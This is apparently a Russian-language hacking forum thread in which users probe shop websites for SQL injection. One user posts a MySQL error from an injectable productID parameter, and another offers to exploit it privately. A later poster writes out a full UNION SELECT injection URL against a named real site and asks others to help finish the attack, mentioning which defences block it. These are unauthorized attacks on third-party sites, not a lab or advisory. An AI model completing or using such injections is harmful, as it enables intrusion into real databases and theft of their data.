![]() |
sql ХЕЛП
подставил кавыяку и вижу.
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 SQL query : select count(*) from ss_products_b where productID=234401\' |
отВет В студию тоже не пойдёт...
|
Скорее всего здесь скуля. Если не супер секретно, то кинь ссылку в ПМ, покопаю.
|
ну что можно сделать я бы рад дать но боюсь у вас соблазн появиться -)))) чесслова)
а так мож там экранировать или что можно сделать |
|
Цитата:
|
да нет там шоп, боюсь отдавать .. эх... плин.
|
Цитата:
|
Цитата:
|
Дабы не создавать еще один пост решил тут написать. Не могу докрутить иньекцию:
_http://pnevmo.ru/index.php?cat_id=-83'+union+select+1,2,3,4,5,6,user(),8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24/* если кто докрутит отпишитесь пожалуста что делали. P.S доступ к information_schema и на выполнение into outfile закрыт. |
| Время: 01:25 |